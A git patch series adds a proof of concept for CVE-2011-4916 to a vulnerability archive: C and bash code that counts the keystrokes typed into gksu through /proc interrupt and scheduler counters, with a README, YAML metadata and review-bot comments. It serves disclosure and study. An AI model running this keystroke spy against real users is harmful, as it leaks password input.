From b8c8c8f29419062837350eb17665943445016bd3 Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 11:52:28 +0000 Subject: [PATCH 1/8] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2011-4916?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/CVE-2011-4916/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011/CVE-2011-4916/.keep diff --git a/cve/linux-kernel/2011/CVE-2011-4916/.keep b/cve/linux-kernel/2011/CVE-2011-4916/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 2bedee0f32df7ac2593b121cd62c1b6d9a03ac01 Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 11:53:08 +0000 Subject: [PATCH 2/8] =?UTF-8?q?add=20cve/linux-kernel/2011/CVE-2011-4916/C?= =?UTF-8?q?VE-2011-4916.c.=20=E6=8F=90=E4=BA=A4POC?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: gzm --- .../2011/CVE-2011-4916/CVE-2011-4916.c | 178 ++++++++++++++++++ 1 file changed, 178 insertions(+) create mode 100644 cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c diff --git a/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c new file mode 100644 index 00000000..949781c2 --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c 
@@ -0,0 +1,178 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +int i8042_number; +int ints[1024], ints_prev[1024], ints_delta[1024]; + +char buffer[1024]; + +int reread_ints(int *interrupts, int int_count, char **names) +{ + int i; + int n, c1, c2; + char s1[1024], s2[1024]; + + int interrupts_fd; + FILE *interrupts_file; + + interrupts_fd = open("/proc/interrupts", O_RDONLY); + if (interrupts_fd == -1) + err(1, "open(\"/proc/interrupts\")"); + + interrupts_file = fdopen(interrupts_fd, "r"); + if (interrupts_file == NULL) + err(1, "fdopen"); + + if (fseek(interrupts_file, 0, SEEK_SET) < 0) + err(1, "lseek"); + + fgets(buffer, sizeof(buffer), interrupts_file); + + for (i = 0; i < int_count; i++) { + if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) { + fclose(interrupts_file); + return i; + } + + if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) { + fclose(interrupts_file); + return i; + } + + if (names != NULL && names[i] == NULL) + names[i] = strdup(s2); + + interrupts[i] = c1 + c2; + } + + fclose(interrupts_file); + return int_count; +} + +void init_i8042_number(void) +{ + int i; + int can_be_keyboard[1024]; + char *names[1024]; + int number_of_interrups, can_be_keyboard_numbers; + + number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names); + + /* + * Identify the i8042 interrupt associated with the keyboard by: + * 1) name should be i8042 + * 2) interrupts count emitted in one second shouldn't be more than 100 + */ + for (i = 0; i < number_of_interrups; i++) + can_be_keyboard[i] = strcmp(names[i], "i8042") == 0; + + while (1) { + sleep(1); + reread_ints(ints, sizeof(ints), NULL); + + can_be_keyboard_numbers = 0; + for (i = 0; i < number_of_interrups; i++) { + can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100; + if (can_be_keyboard[i]) + can_be_keyboard_numbers++; + + ints_prev[i] = ints[i]; + } + + if (can_be_keyboard_numbers == 1) { + for (i = 0; i < 
number_of_interrups; i++) + if (can_be_keyboard[i]) { + i8042_number = i; + printf("i8042 keyboard is #%d\n", i); + return; + } + } + } +} + +int i8042_read(void) +{ + reread_ints(ints, sizeof(ints), NULL); + ints_prev[i8042_number] = ints[i8042_number]; + + return ints[i8042_number]; +} + +int wait_for_program(char *pname) +{ + FILE *f; + int pid; + char s[1024]; + + snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;" + " sleep 0.1; done", pname); + system(s); + snprintf(s, sizeof(s), "pgrep %s", pname); + f = popen(s, "r"); + if (f == NULL) + err(1, "popen"); + + if (fgets(buffer, sizeof(buffer), f) == NULL) + err(1, "fgets"); + + if (sscanf(buffer, "%d", &pid) < 1) + err(1, "sscanf"); + + pclose(f); + + return pid; +} + +int main(int argc, char *argv[]) +{ + int n, old, sum, i; + int pid; + char *pname = argv[1]; + + if (argc < 2) + errx(1, "usage: spy-interrupts gksu"); + + puts("Waiting for mouse activity..."); + init_i8042_number(); + + pid = wait_for_program(pname); + printf("%s is %d\n", pname, pid); + + old = i8042_read(); + + sum = 0; + + while (1) { + n = i8042_read(); + if (old == n) + usleep(10000); + else { + for (i = 0; i < n-old; i++) + putchar('.'); + fflush(stdout); + } + + sum += n - old; + old = n; + + if (kill(pid, 0) < 0 && errno == ESRCH) + break; + } + + /* + * #interrupts == 2 * #keystrokes. + * #keystrokes = len(password) - 1 because of ENTER after the password. + */ + printf("\n%d keystrokes\n", (sum-2)/2); + + return 0; +} \ No newline at end of file -- Gitee From 5baeea6a0cde30518990f0461915d47005ebc42e Mon Sep 17 00:00:00 2001 
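Review bot: `names` in init_i8042_number is declared `char *names[1024];` with no initializer, yet reread_ints only fills `names[i]` when `names[i] == NULL`, so a stale non-NULL stack value skips the strdup and the later `strcmp(names[i], "i8042")` dereferences garbage; declare it `char *names[1024] = {0};`. The count argument is also wrong in all three calls: `sizeof(ints_prev)` / `sizeof(ints)` is a byte count (4096 with 4-byte int) passed as int_count, while `interrupts`, `names` and `can_be_keyboard` hold 1024 entries, so a /proc/interrupts with more than 1024 rows writes past them — pass `sizeof(ints) / sizeof(ints[0])` instead. wait_for_program interpolates argv[1] unquoted into the `system()` and `popen()` command strings; for a local PoC that only reads its own argument this is not a trust boundary, but running `pgrep` via fork/execvp with an explicit argv would remove the shell from the path entirely. The `%s` conversions in the sscanf are unbounded and should be `%1023s` to match the size of s1/s2, and the return of the header-skipping `fgets` is ignored.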
From: gzm Date: Tue, 11 Apr 2023 11:53:20 +0000 Subject: [PATCH 3/8] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?linux-kernel/2011/CVE-2011-4916/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/CVE-2011-4916/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2011/CVE-2011-4916/.keep diff --git a/cve/linux-kernel/2011/CVE-2011-4916/.keep b/cve/linux-kernel/2011/CVE-2011-4916/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 3079bf3241f0fbd33fe8019cbbd7803ba20c7fa3 Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 11:58:01 +0000 Subject: [PATCH 4/8] =?UTF-8?q?update=20cve/linux-kernel/2011/CVE-2011-491?= =?UTF-8?q?6/CVE-2011-4916.c.=20=E4=BF=AE=E6=94=B9PoC?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: gzm --- .../2011/CVE-2011-4916/CVE-2011-4916.c | 214 +++--------------- 1 file changed, 36 insertions(+), 178 deletions(-) diff --git a/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c index 949781c2..addc78ce 100644 --- a/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c +++ b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c 
@@ -1,178 +1,36 @@ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - - -int i8042_number; -int ints[1024], ints_prev[1024], ints_delta[1024]; - -char buffer[1024]; - -int reread_ints(int *interrupts, int int_count, char **names) -{ - int i; - int n, c1, c2; - char s1[1024], s2[1024]; - - int interrupts_fd; - FILE *interrupts_file; - - interrupts_fd = open("/proc/interrupts", O_RDONLY); - if (interrupts_fd == -1) - err(1, "open(\"/proc/interrupts\")"); - - interrupts_file = fdopen(interrupts_fd, "r"); - if (interrupts_file == NULL) - err(1, "fdopen"); - - if (fseek(interrupts_file, 0, SEEK_SET) < 0) - err(1, "lseek"); - - fgets(buffer, sizeof(buffer), interrupts_file); - - for (i = 0; i < int_count; i++) { - if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) { - fclose(interrupts_file); - return i; - } - - if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) { - fclose(interrupts_file); - return i; - } - - if (names != NULL && names[i] == NULL) - names[i] = strdup(s2); - - interrupts[i] = c1 + c2; - } - - fclose(interrupts_file); - return int_count; -} - -void init_i8042_number(void) -{ - int i; - int can_be_keyboard[1024]; - char *names[1024]; - int number_of_interrups, can_be_keyboard_numbers; - - number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names); - - /* - * Identify the i8042 interrupt associated with the keyboard by: - * 1) name should be i8042 - * 2) interrupts count emitted in one second shouldn't be more than 100 - */ - for (i = 0; i < number_of_interrups; i++) - can_be_keyboard[i] = strcmp(names[i], "i8042") == 0; - - while (1) { - sleep(1); - reread_ints(ints, sizeof(ints), NULL); - - can_be_keyboard_numbers = 0; - for (i = 0; i < number_of_interrups; i++) { - can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100; - if (can_be_keyboard[i]) - can_be_keyboard_numbers++; - - ints_prev[i] = ints[i]; - } - - if (can_be_keyboard_numbers == 1) { - for (i = 0; i < 
number_of_interrups; i++) - if (can_be_keyboard[i]) { - i8042_number = i; - printf("i8042 keyboard is #%d\n", i); - return; - } - } - } -} - -int i8042_read(void) -{ - reread_ints(ints, sizeof(ints), NULL); - ints_prev[i8042_number] = ints[i8042_number]; - - return ints[i8042_number]; -} - -int wait_for_program(char *pname) -{ - FILE *f; - int pid; - char s[1024]; - - snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;" - " sleep 0.1; done", pname); - system(s); - snprintf(s, sizeof(s), "pgrep %s", pname); - f = popen(s, "r"); - if (f == NULL) - err(1, "popen"); - - if (fgets(buffer, sizeof(buffer), f) == NULL) - err(1, "fgets"); - - if (sscanf(buffer, "%d", &pid) < 1) - err(1, "sscanf"); - - pclose(f); - - return pid; -} - -int main(int argc, char *argv[]) -{ - int n, old, sum, i; - int pid; - char *pname = argv[1]; - - if (argc < 2) - errx(1, "usage: spy-interrupts gksu"); - - puts("Waiting for mouse activity..."); - init_i8042_number(); - - pid = wait_for_program(pname); - printf("%s is %d\n", pname, pid); - - old = i8042_read(); - - sum = 0; - - while (1) { - n = i8042_read(); - if (old == n) - usleep(10000); - else { - for (i = 0; i < n-old; i++) - putchar('.'); - fflush(stdout); - } - - sum += n - old; - old = n; - - if (kill(pid, 0) < 0 && errno == ESRCH) - break; - } - - /* - * #interrupts == 2 * #keystrokes. - * #keystrokes = len(password) - 1 because of ENTER after the password. - */ - printf("\n%d keystrokes\n", (sum-2)/2); - - return 0; -} \ No newline at end of file +PNAME="$1" + +while :; do + PID=`pgrep "$PNAME"` + if [ -n "$PID" ]; then + echo $PID + cd /proc/$PID/ + break + fi + sleep 1 +done + +S=0.0 +while :; do + V=`grep se.exec_start sched 2>/dev/null | cut -d: -f2-` + [ -z "$V" ] && break + if [ "$V" != "$S" ]; then + VAL=`echo "$V - $S" | bc -l` + VALI=`echo $VAL | cut -d. 
-f1` + [ -z "$VALI" ] && VALI=0 + + if [ "$VALI" -le 815 -a "$VALI" -ge 785 ]; then + # Cursor appeared + : + elif [ $VALI -le 415 -a $VALI -ge 385 ]; then + # Cursor disappeared + : + elif [ $VALI -ge 150 ]; then + echo "$VAL (KEY PRESSED)" + else + echo "$VAL" + fi + + S=$V + fi +done \ No newline at end of file -- Gitee From 91054df8421019c4a094e274632b42cd26fc6862 Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 12:00:48 +0000 Subject: [PATCH 5/8] =?UTF-8?q?add=20cve/linux-kernel/2011/CVE-2011-4916/R?= =?UTF-8?q?EADME.md.=20=E6=B7=BB=E5=8A=A0README.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: gzm --- cve/linux-kernel/2011/CVE-2011-4916/README.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 cve/linux-kernel/2011/CVE-2011-4916/README.md diff --git a/cve/linux-kernel/2011/CVE-2011-4916/README.md b/cve/linux-kernel/2011/CVE-2011-4916/README.md new file mode 100644 index 00000000..6ca03d6e --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4916/README.md @@ -0,0 +1,14 @@ +A PoC for spying for keystrokes in gksu in Linux <= 3.1. + +/proc/$PID/{sched,schedstat} are world readable, so we can just loop +on one CPU core while the victim is executed on another, and spy for +the changes of scheduling counters. The PoC counts only keystrokes number, +but it can be easily extended to note the delays between the keystrokes +and do the statistical analysis to learn the input characters. See +e.g. "Peeping Tom in the Neighborhood: Keystroke Eavesdropping on +Multi-User Systems" by Kehuan Zhang and XiaoFeng Wang. + +It is NOT stable, it only shows a design flaw (the lack of proper +permission model of procfs debugging counters). The constants are true +for the author's system only and don't take into account other sources of +gksu CPU activity. \ No newline at end of file -- Gitee From 23153bcb92ddfd8ed49798dace429a3fdc434ad8 Mon Sep 17 00:00:00 2001 
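Review bot: `cd /proc/$PID/` in the first loop is unchecked and `$PID` is unquoted; pgrep prints one PID per line, so with several matching processes bash reports too many arguments for `cd`, the unconditional `break` still leaves the loop, and the second loop then greps a `sched` file in the current directory, sees an empty `$V` and exits silently. Take a single match and fail loudly: `PID=$(pgrep -n "$PNAME")` and `cd "/proc/$PID" || exit 1`. The three range tests mix quoted and unquoted `$VALI` and rely on the obsolescent `-a`; `[ "$VALI" -le 815 ] && [ "$VALI" -ge 785 ]` is the portable form. The thresholds 785–815, 385–415 and 150 are magic numbers the README in this series says are specific to the author's machine; naming them as variables at the top of the script would make that visible to anyone adapting it.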
From: gzm
Date: Tue, 11 Apr 2023 12:02:42 +0000
Subject: [PATCH 6/8] update cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c.
Signed-off-by: gzm
---
 .../2011/CVE-2011-4916/CVE-2011-4916.c | 21 +++++++++++++++++++
 1 file changed, 21 insertions(+)
diff --git a/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c
index addc78ce..df2656d1 100644
--- a/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c
+++ b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c
@@ -1,3 +1,24 @@
+#!/bin/bash
+#
+# A PoC for spying for keystrokes in gksu in Linux <= 3.1.
+#
+# /proc/$PID/{sched,schedstat} are world readable, so we can just loop
+# on one CPU core while the victim is executed on another, and spy for
+# the changes of scheduling counters. The PoC counts only keystrokes number,
+# but it can be easily extended to note the delays between the keystrokes
+# and do the statistical analysis to learn the input characters. See
+# e.g. "Peeping Tom in the Neighborhood: Keystroke Eavesdropping on
+# Multi-User Systems" by Kehuan Zhang and XiaoFeng Wang.
+#
+# It is NOT stable, it only shows a design flaw (the lack of proper
+# permission model of procfs debugging counters). The constants are true
+# for the author's system only and don't take into account other sources of
+# gksu CPU activity.
+#
+# by segoon from openwall
+#
+# run as: spy-sched gksu
+
 PNAME="$1"
 while :; do
--
Gitee
From 3ca8d93de8243cbb664a6643633da68ab369cd40 Mon Sep 17 00:00:00 2001
From: gzm
Date: Tue, 11 Apr 2023 12:06:11 +0000
Subject: [PATCH 7/8] add cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml.
Signed-off-by: gzm
---
 cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)
 create mode 100644 cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml
diff --git a/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml b/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml
new file mode 100644
index 00000000..2442cf53
--- /dev/null
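Review bot: The usage line `# run as: spy-sched gksu` names a script that does not exist in the tree — the header is prepended to `cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c`, which the context lines (`PNAME="$1"`, `while :; do`) show is a bash script despite the `.c` extension, and the new `#!/bin/bash` line makes that mismatch permanent. Either rename the file to `CVE-2011-4916.sh` and write `# run as: ./CVE-2011-4916.sh gksu`, or state in the header that this is a shell script kept under a `.c` name; as written, a reader following the filename will try to compile it.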
+++ b/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml
@@ -0,0 +1,18 @@
+id: CVE-2011-4916
+source: https://www.openwall.com/lists/oss-security/2011/11/05/3
+info:
+ name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+ severity: medium
+ description: Linux内核3.1版允许本地用户通过访问/dev/pts/和/dev/tty*来获取敏感的击键信息。
+ scope-of-influence:
+ Linux kernel <= 3.1
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2011-4916
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 5.5
+ cve-id: CVE-2011-4916
+ cwe-id: CWE-200
+ cnvd-id: None
+ kve-id: None
+ tags: information disclosure
\ No newline at end of file
--
Gitee
From 441e83f7d299921dcacb449857568894003ec816 Mon Sep 17 00:00:00 2001
From: gzm
Date: Tue, 11 Apr 2023 12:07:29 +0000
Subject: [PATCH 8/8] update other_list.yaml.
Signed-off-by: gzm
---
 other_list.yaml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/other_list.yaml b/other_list.yaml
index cf82c0bd..6280d85a 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -15,6 +15,7 @@ cve:
 - CVE-2023-0179
 - CVE-2018-18955
 - CVE-2011-4917
+ - CVE-2011-4916
 polkit:
 - CVE-2021-3560
 Outlook:
--
Gitee
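Review bot: The `description` field attributes the disclosure to `/dev/pts/` and `/dev/tty*`, while the PoC and README added earlier in this series read `/proc/$PID/sched` (and, in the first C version, `/proc/interrupts`), so the metadata and the code do not describe the same interface; either the description should mention the procfs scheduling counters the PoC actually samples, or a line should note that the PoC demonstrates a related vector from the same advisory — the linked oss-security post presumably covers several, so please confirm against it. `scope-of-influence:` is followed by an indented bare line rather than a value; YAML reads it as a plain-scalar continuation, but `scope-of-influence: Linux kernel <= 3.1` is unambiguous and matches how the other keys are written. `cnvd-id: None` and `kve-id: None` are the string `None`, not a null; use `null` (or `~`) if consumers expect an absent value.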